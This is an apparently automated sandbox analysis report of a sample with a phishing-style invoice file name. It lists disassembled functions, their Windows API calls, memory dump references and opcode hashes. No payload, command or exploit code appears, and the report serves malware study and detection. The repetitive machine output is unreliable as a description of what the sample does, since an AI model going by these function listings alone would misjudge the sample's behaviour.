                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Long$MetricsSystem
                    • String ID:
                    • API String ID: 2294984445-0
                    • Opcode ID: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                    • Instruction ID: 7f573414b167fdfe88117bb64a049d7fb903633b63355555143abc9f94663d74
                    • Opcode Fuzzy Hash: a6ce8afc5c03cfe0f99b0506baeb19ed1665b3c295105fbec83bd081e2070333
                    • Instruction Fuzzy Hash: 34215C75910265AFCB20DF388C48A6A3BA4FB05730B154629FD26D66E2E7309A50FB90
                    Function 00ED97E9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00ED9802
                      • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9834
                    • __itow.LIBCMT ref: 00ED984C
                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED9874
                    • __itow.LIBCMT ref: 00ED9885
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$__itow$_memmove
                    • String ID:
                    • API String ID: 2983881199-0
                    • Opcode ID: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                    • Instruction ID: 74e44f9187f45adb53c8bc92daba6bace42bbcf410938b0e69c4439aac26b01a
                    • Opcode Fuzzy Hash: 7fc0a3f31f07f1f9edef986280adb6c7eda5d1cd8cc4c1652905887e9bcabb86
                    • Instruction Fuzzy Hash: F3210035B002046FDB14AA718C86EEE7BE8EF4AB14F041026FD05FB341D670DD46A791
                    Function 00E812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                    • SelectObject.GDI32(?,00000000), ref: 00E8135C
                    • BeginPath.GDI32(?), ref: 00E81373
                    • SelectObject.GDI32(?,00000000), ref: 00E8139C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ObjectSelect$BeginCreatePath
                    • String ID:
                    • API String ID: 3225163088-0
                    • Opcode ID: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                    • Instruction ID: f769fbba0092325fe082c005ad41211150c705c7230d746b563b507d12ff8f18
                    • Opcode Fuzzy Hash: 3b7d0eead5154bd0f8e10553b9baddcb3f07c3da8cf5c7459d3ceafb4e00ab7c
                    • Instruction Fuzzy Hash: 4C215E7480030CEBDB11AF25DC047A97BB9FB22326F148266F818E65A0D3719896EB91
                    Function 00EDC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    • Opcode ID: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                    • Instruction ID: c4e513e58648d3b9e232724f97b89aa81f60b3f0c6e4f87b85add8f0cb993994
                    • Opcode Fuzzy Hash: 99ec14ffbb27ec9ac93eb63ff421c65563115439c0bdfb94ec848b368d9c2bef
                    • Instruction Fuzzy Hash: 0B0196716052277BD204A6215C42EEF77ACDF563E8F145152FD04FA343E661EE12D2E1
                    Function 00EE4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00EE4D5C
                    • __beginthreadex.LIBCMT ref: 00EE4D7A
                    • MessageBoxW.USER32(?,?,?,?), ref: 00EE4D8F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00EE4DA5
                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00EE4DAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                    • String ID:
                    • API String ID: 3824534824-0
                    • Opcode ID: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                    • Instruction ID: 61a0fa92f1b38d6c6f399c4d7999f1df9220a80b0f0d4771434a95dc64493ae9
                    • Opcode Fuzzy Hash: 6e8ddf202f549aa83052be5e3abcfd7bfa8c7c19c81ee1dc33026b9404796ae5
                    • Instruction Fuzzy Hash: 0C1104B690424CBBCB119FA99C08ADA7FACEB9A324F144265FD14E3290D6B18D4497A1
                    Function 00ED874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                    • GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                    • GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                    • RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 883493501-0
                    • Opcode ID: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                    • Instruction ID: 6c657d0ba45e4199025d7c4894d34a3c17918cbfb37a79da293a36b2b7c02953
                    • Opcode Fuzzy Hash: a6a49fcb64cd96148f59b1a83ddc00f7e30c36b7c71ba9f77538a0df0e76317b
                    • Instruction Fuzzy Hash: 0E016D71600208FFDB204FA6DD88D6B7BACFF89359720043AF849D2260DA329C05DA60
                    Function 00EE54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5502
                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5510
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE5518
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00EE5522
                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EE555E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: PerformanceQuery$CounterSleep$Frequency
                    • String ID:
                    • API String ID: 2833360925-0
                    • Opcode ID: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                    • Instruction ID: 5e8dbebc6019772709c5bd966824ea2b084f61d1d0f4ab765fddd664a438b346
                    • Opcode Fuzzy Hash: a12e5fff57db7d0a98e554664237172679025bfaf1ca8fd666802f6a9011763c
                    • Instruction Fuzzy Hash: BF012D36D00A5DDBCF10DFE9E8885EDBB79FB09715F401056E901B2540DB709558D7A1
                    Function 00ED85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ED8608
                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ED8612
                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ED8621
                    • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ED8628
                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ED863E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                    • Instruction ID: 715de3dc67fbb9e11dafa72a1e11b5548bd8272b1895f6184d9cb5e53fffcfc8
                    • Opcode Fuzzy Hash: deff1b399c48557fae45e3a65b5c775bb3bb70f3d53170ae2bf53e494f9e91eb
                    • Instruction Fuzzy Hash: 2CF06231205308AFEB200FA9DD8DE6B3BACFF89768B005426F945D6250CB71DC46EA60
                    Function 00ED8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ED8669
                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8673
                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED8682
                    • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ED8689
                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ED869F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: HeapInformationToken$AllocateErrorLastProcess
                    • String ID:
                    • API String ID: 47921759-0
                    • Opcode ID: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                    • Instruction ID: 8c82d4c91fc67f14b25a133d7a295819cc1e64c6a76792c48103806088504e1d
                    • Opcode Fuzzy Hash: 5c6034dc71b6cfc803e1f0dbff7014bf9b0c1a09f17bab5f50fcef10dd668e79
                    • Instruction Fuzzy Hash: C4F04F71200308BFEB211FA5EC88E673BACFF89768B100036F955D7250CA61D945EA60
                    Function 00EDC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00EDC6BA
                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EDC6D1
                    • MessageBeep.USER32(00000000), ref: 00EDC6E9
                    • KillTimer.USER32(?,0000040A), ref: 00EDC705
                    • EndDialog.USER32(?,00000001), ref: 00EDC71F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                    • String ID:
                    • API String ID: 3741023627-0
                    • Opcode ID: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                    • Instruction ID: c01cb00878e31f2eea7425bdf5d3cc60148d945a12fd4c834509ab099e271694
                    • Opcode Fuzzy Hash: 279abd9201bb80a0f4d874e51ce8edc7df7642a04ab7976597159209dafcffa0
                    • Instruction Fuzzy Hash: 4801A230400309ABEB315B20DD4EF9677B8FF04B45F14166AF586B15E0DBE1A959DF80
                    Function 00E813B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                    Download Yara Rule
                    APIs
                    • EndPath.GDI32(?), ref: 00E813BF
                    • StrokeAndFillPath.GDI32(?,?,00EBBAD8,00000000,?), ref: 00E813DB
                    • SelectObject.GDI32(?,00000000), ref: 00E813EE
                    • DeleteObject.GDI32 ref: 00E81401
                    • StrokePath.GDI32(?), ref: 00E8141C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Path$ObjectStroke$DeleteFillSelect
                    • String ID:
                    • API String ID: 2625713937-0
                    • Opcode ID: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                    • Instruction ID: 5b86d4a05ec0e1a3e682bde979b2ad92ad32568e4435a7e425f3a7469317306b
                    • Opcode Fuzzy Hash: bad954fac0b54ffc504b0bffd523084a39d18b4a21018a4a9ce83a1d5e758be1
                    • Instruction Fuzzy Hash: A8F0C97400470CEBDB226F26EC0C7583BA9BB22326F04D264E82D959F1C731499AEF51
                    Function 00ED8E74 Relevance: 7.5, APIs: 5, Instructions: 23memorysynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00ED8E7F
                    • CloseHandle.KERNEL32(?), ref: 00ED8E94
                    • CloseHandle.KERNEL32(?), ref: 00ED8E9C
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00ED8EA5
                    • HeapFree.KERNEL32(00000000), ref: 00ED8EAC
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CloseHandleHeap$FreeObjectProcessSingleWait
                    • String ID:
                    • API String ID: 3751786701-0
                    • Opcode ID: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                    • Instruction ID: f6fb7602b89906ccef6407152ae8ed2f2a46ab68a82b4ff777b5f62a13e73014
                    • Opcode Fuzzy Hash: 8f6fc1e4f9a31e97b87e04cd9cb187e35d870da9c5bcdd396bff6e9a74e9fcb3
                    • Instruction Fuzzy Hash: 66E0E536004209FBDB215FE1EC0C90ABF79FF89722B108230F219C1870CB329468EB90
                    Function 00E92E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                      • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                      • Part of subcall function 00E87BB1: _memmove.LIBCMT ref: 00E87C0B
                    • __swprintf.LIBCMT ref: 00E9302D
                    Strings
                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00E92EC6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                    • API String ID: 1943609520-557222456
                    • Opcode ID: c40e0f577de1b53299b4cf10ba4469c7778f7f0d1da8656e8c8f1956b5f5149d
                    • Instruction ID: 952340995fd7ecb3f133c2ae0d1adc7de5b7d7984de8d4ff0d3e80496a0a7d28
                    • Opcode Fuzzy Hash: c40e0f577de1b53299b4cf10ba4469c7778f7f0d1da8656e8c8f1956b5f5149d
                    • Instruction Fuzzy Hash: 2D917B312083419FCB18EF24D985D6FB7E5EF85744F00295DF49AAB2A1DB20EE45CB52
                    Function 00EA524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                    Download Yara Rule
                    APIs
                    • __startOneArgErrorHandling.LIBCMT ref: 00EA52DD
                      • Part of subcall function 00EB0340: __87except.LIBCMT ref: 00EB037B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorHandling__87except__start
                    • String ID: pow
                    • API String ID: 2905807303-2276729525
                    • Opcode ID: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                    • Instruction ID: fcf8c71e94b4586a8eb55ff92ae448a0fe42e81f74abd32e64b17be3c653ce34
                    • Opcode Fuzzy Hash: 10b0887f900c98ad1433c1186aeab491450e52123b475ca21143ebac0cfc7e38
                    • Instruction Fuzzy Hash: 49518B22A0C70586CB107714CA413FF3BE09B56354F20AD68F4A5791E9EF74BCD8AA91
                    Function 00EA023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
